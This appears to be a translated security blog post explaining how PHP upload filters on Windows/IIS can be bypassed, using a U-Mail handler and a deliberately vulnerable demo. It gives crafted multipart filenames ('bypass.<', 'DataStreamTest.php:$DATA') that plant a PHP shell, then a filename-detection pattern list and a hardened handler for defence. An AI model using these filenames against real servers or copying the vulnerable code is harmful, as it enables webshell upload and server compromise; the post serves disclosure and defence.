Pkav: common windows upload defects in php

Source: Internet
Author: User
$ Pkav -> publish {when PHP meets Windows}
Jianxin @xsser abandoned me, but I cannot abandon the dark clouds ..
PHP makes Windows easy. It is like a man meeting a woman: problems will arise sooner or later ..
Thanks to @gainover
Tips: This article describes a new file upload method (a vulnerability caused by several system features) and provides corresponding examples ..

Detailed description:

#1 Instance introduction

The example used in this article is the U-Mail system.

The code of the place where U-Mail system files are uploaded is as follows:

Code Region

if (ACTION == "attach-upload") {
    if ($_FILES) {
        $file_name   = $_FILES['filedata']['name'];
        $file_type   = $_FILES['filedata']['type'];
        $file_size   = $_FILES['filedata']['size'];
        $file_source = $_FILES['filedata']['tmp_name'];
        $file_suffix = getfilenamesuffix($file_name);
        // Blacklist of extensions; everything not listed here is accepted
        $not_allow_ext = array("php", "phps", "php3", "exe", "bat");
        if (in_array($file_suffix, $not_allow_ext)) {
            dump_json(array("status" => 0, "message" => el("file upload with this extension not supported", "")));
        }
        $path_target = getusercachepath();
        do {
            $file_id = makerandomname();
            // The user-supplied suffix is appended unchanged to the random name
            $file_target = $path_target . $file_id . "." . $file_suffix;
        } while (file_exists($file_target));
        if (!move_uploaded_file($file_source, $file_target)) {
            dump_json(array("status" => 0, "message" => el("An error occurred while writing files. Please contact the administrator!", "")));
        }
        $_SESSION[SESSION_ID]['attach_cache'][] = array("id" => $file_id, "name" => $file_name, "type" => "1", "path" => $file_target, "size" => $file_size);
        dump_json(array("status" => "1", "filename" => $file_name, "filesize" => $file_size, "file_id" => $file_id));
    } else {
        dump_json(array("status" => "0", "message" => el("the file to be uploaded cannot be found!", "")));
    }
}



We noticed the following code:

Code Region
$not_allow_ext = array("php", "phps", "php3", "exe", "bat");
if (in_array($file_suffix, $not_allow_ext)) {
    dump_json(array("status" => 0, "message" => el("file upload with this extension not supported", "")));
}



Obviously, blacklist validation is used. We could bypass the check with a suffix such as bypass.phpX (where X is a space, %20, or another special character in the range %80-%99), but that is not what I want to talk about today.

Today, I will use this example to explain a new file upload method ..

#2 PoC code implementation

To make local testing easier, we simplify the code above as follows:

Code Region

<?php
// U-Mail demo ...
if (isset($_POST['submit'])) {
    // Base name comes from a form field and is reduced to word characters
    $filename = $_POST['filename'];
    $filename = preg_replace("/[^\w]/i", "", $filename);
    // Uploaded name keeps word characters plus : $ . < > ( ) |
    $upfile = $_FILES['file']['name'];
    $upfile = str_replace(';', "", $upfile);
    $upfile = preg_replace("/[^(\w|\:|\$|\.|\<|\>)]/i", "", $upfile);
    $tempfile = $_FILES['file']['tmp_name'];

    $ext = trim(get_extension($upfile)); // null

    if (in_array($ext, array('php', 'php3', 'php5'))) {
        die('Warning ! File type error..');
    }

    if ($ext == 'asp' or $ext == 'asa' or $ext == 'cer' or $ext == 'cdx' or $ext == 'aspx' or $ext == 'htaccess') $ext = 'file';

    //$savefile = 'upload/'.$upfile;
    $savefile = 'upload/' . $filename . "." . $ext;

    if (move_uploaded_file($tempfile, $savefile)) {
        die('Success upload..path :' . $savefile);
    } else {
        die('Upload failed..');
    }
}
// Everything after the last dot, lower-cased
function get_extension($file) {
    return strtolower(substr($file, strrpos($file, '.') + 1));
}
?>






For the code above, although the file name is only checked against a blacklist, none of the currently known upload tricks can get a PHP file onto the server (setting aside bugs in the program), so this upload code appears to be "secure".

However, I suddenly looked back, and there in that dark place, where PHP meets Windows, a beautiful love story is born ..

#3 The story in detail

One day, Second Brother dropped a URL in the group. I had only briefly read about using system features for file uploads; my interest was piqued, so I studied it carefully, and hence this article ..



In PHP + Windows + IIS:

Double quote (") <=> dot (.)

Greater-than sign (>) <=> question mark (?)

Less-than sign (<) <=> asterisk (*)

If such a fun thing exists, can't we do a lot with it? Not quite. Through a series of tests, we found that this feature can only be used to overwrite a known file during file upload, so it is a little awkward to use ..

There are two reasons:

1) the directory that files are uploaded to is generally not under our control;

2) at the same time, the upload directory will not contain the PHP file we want, so there is nothing to overwrite;

Later, after repeated reflection, I finally found a perfect solution ..

The idea is as follows:

First, we use a special method to generate a PHP file, and then use this feature to overwrite that file ..

But the problem arises again: how can we generate a PHP file? If we could directly generate a PHP file, why would we need this feature at all?

Don't worry, there is always a way ..

We all know that when uploading a file, we often consider file name truncation, such as %00 ..

Yes! Some may also use a colon (":") to truncate, such as bypass.php:jpg.

But did you know? The file generated by colon truncation is blank; there is no content in it. Do you see where this leads? Although the generated PHP file has no content, a PHP file is nevertheless created, so we can use the feature mentioned above to make perfect use of it ..

#4 Colon truncation + the feature, used successfully

Following the idea from #3, put it into practice ..

Local test address: http://www.secmap.cn/upfile.php
Environment: Windows + IIS 7.5

1) First, use colon truncation to generate the PHP file to be overwritten. Here: bypass.php,



Click Go and view the bypass.php file that was successfully generated.



2) Overwrite the file using the system feature above

From the above, we already know that "<" is equivalent to "*", and "*" matches any characters in the name ..

So we can modify the file name as follows:

Code Region
------WebKitFormBoundaryaarrn2lbvpvcwk
Content-Disposition: form-data; name="file"; filename="bypass.<"
Content-Type: image/jpeg
// Note! File name: bypass.<



Click Go... to overwrite the bypass.php file,



Comparing the two screenshots above, the content has been successfully written into bypass.php ..



#5 Feature 2

First, let's take a look at this paragraph from Microsoft MSDN,



Note the English text circled in red:

Code Region
The default data stream has no name. That is, the fully qualified name for the default stream for a file called "sample.txt" is "sample.txt::$DATA" since "sample.txt" is the name of the file and "$DATA" is the stream type.



Enough said, let's try it ..

Similarly, we can modify the uploaded file name as follows:

Code Region
------WebKitFormBoundaryaarrn2lbvpvcwk
Content-Disposition: form-data; name="file"; filename='DataStreamTest.php:$DATA'
Content-Type: image/jpeg
// Note! File name: DataStreamTest.php:$DATA



Click Go, and a miracle appears ..



Access...
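From the defender's side, the three name forms used in #3, #4 and #5 are easy to spot before the file ever reaches move_uploaded_file(). The following is an added example, not code from the original post or from U-Mail: it pulls every filename= parameter out of a raw multipart/form-data body and reports the Windows/NTFS name tricks the article describes, so the result can be logged or fed to a WAF rule. The request bodies and the boundary string are constructed samples.

```php
<?php
// Added example: flag upload filenames that rely on Windows/NTFS name handling.
// Each regex is paired with the feature from the article that it corresponds to.
const SUSPICIOUS_FILENAME_PATTERNS = [
    '/:\$DATA$/i' => 'NTFS default data stream suffix (:$DATA)',
    '/:/'         => 'colon in name (alternate data stream / colon truncation)',
    '/[<>"]/'     => 'DOS wildcard characters < > " in name',
    '/\x00/'      => 'NUL byte in name',
];

/** Extract every filename="..." or filename='...' value from a multipart body. */
function multipart_filenames(string $body): array {
    preg_match_all(
        '/Content-Disposition:[^\r\n]*?filename=(?:"([^"]*)"|\'([^\']*)\')/i',
        $body, $m, PREG_SET_ORDER
    );
    // Group 1 is the double-quoted form, group 2 the single-quoted form
    return array_map(fn($x) => $x[1] !== '' ? $x[1] : ($x[2] ?? ''), $m);
}

/** Return [filename => [reason, ...]] for every name that matches a pattern. */
function scan_multipart_filenames(string $body): array {
    $findings = [];
    foreach (multipart_filenames($body) as $name) {
        foreach (SUSPICIOUS_FILENAME_PATTERNS as $re => $why) {
            if (preg_match($re, $name)) {
                $findings[$name][] = $why;
            }
        }
    }
    return $findings;
}

// Constructed sample bodies mirroring the filenames used in the article
// (a benign upload, the wildcard overwrite, and the $DATA stream form).
$samples = [
    "--b\r\nContent-Disposition: form-data; name=\"file\"; filename=\"photo.jpg\"\r\n\r\n...\r\n--b--",
    "--b\r\nContent-Disposition: form-data; name=\"file\"; filename=\"bypass.<\"\r\n\r\n...\r\n--b--",
    "--b\r\nContent-Disposition: form-data; name=\"file\"; filename='DataStreamTest.php:\$DATA'\r\n\r\n...\r\n--b--",
];
foreach ($samples as $body) {
    foreach (scan_multipart_filenames($body) as $name => $reasons) {
        fwrite(STDERR, "suspicious upload filename {$name}: " . implode('; ', $reasons) . "\n");
    }
}
```

Only the second and third samples produce findings (photo.jpg is clean). Web server access logs do not record multipart filenames, so this check has to run in the application front controller or a WAF, not over logs after the fact.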

#6 Vulnerability proof

Exploiting U-Mail works the same way as the method above. For simplicity, you can capture the request directly and change the file name:

Shell.php:$DATA can be uploaded successfully. It is not demonstrated here; the result is a shell.
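The root cause in both the U-Mail handler and the demo is that a user-controlled suffix is appended to the stored path after a blacklist check. The following is an added hardened rewrite of the demo handler, not code from U-Mail or from the original post. It assumes PHP 7.4+ with the fileinfo extension, a writable ./upload directory served with script execution disabled, and an image-only upload (adjust ALLOWED_TYPES for your application). The client filename is never used to build the path, so ":", "<", ">", '"' and ":$DATA" have nothing to act on.

```php
<?php
// Added example: hardened replacement for the demo upload handler.
// Allowed extensions, keyed by the MIME type finfo must report for the bytes.
const ALLOWED_TYPES = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

// Decide the stored extension from the file contents only; the client-supplied
// name is never consulted, so no name trick can reach the filesystem.
function extension_for_content(string $tmpPath): ?string {
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    $ext = array_search($mime, ALLOWED_TYPES, true);
    return $ext === false ? null : $ext;
}

function store_upload(array $file, string $uploadDir): array {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return ['status' => 0, 'message' => 'no usable upload'];
    }
    $ext = extension_for_content($file['tmp_name']);
    if ($ext === null) {
        return ['status' => 0, 'message' => 'file type not allowed'];
    }
    // Server-generated name: hex digits only, so it cannot carry any special
    // character, and the allowlisted extension is the only suffix ever written.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($uploadDir, '/\\') . DIRECTORY_SEPARATOR . $name;
    // Refuse to overwrite: the wildcard trick depends on overwriting a known file.
    if (file_exists($target) || !move_uploaded_file($file['tmp_name'], $target)) {
        return ['status' => 0, 'message' => 'could not store file'];
    }
    chmod($target, 0644);
    // Keep the original name for display only (e.g. in the database), never on disk.
    $displayName = basename(str_replace("\0", '', (string) $file['name']));
    return ['status' => 1, 'file_id' => $name, 'filename' => $displayName];
}

if (isset($_FILES['file'])) {
    header('Content-Type: application/json');
    echo json_encode(store_upload($_FILES['file'], __DIR__ . '/upload'));
}
```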
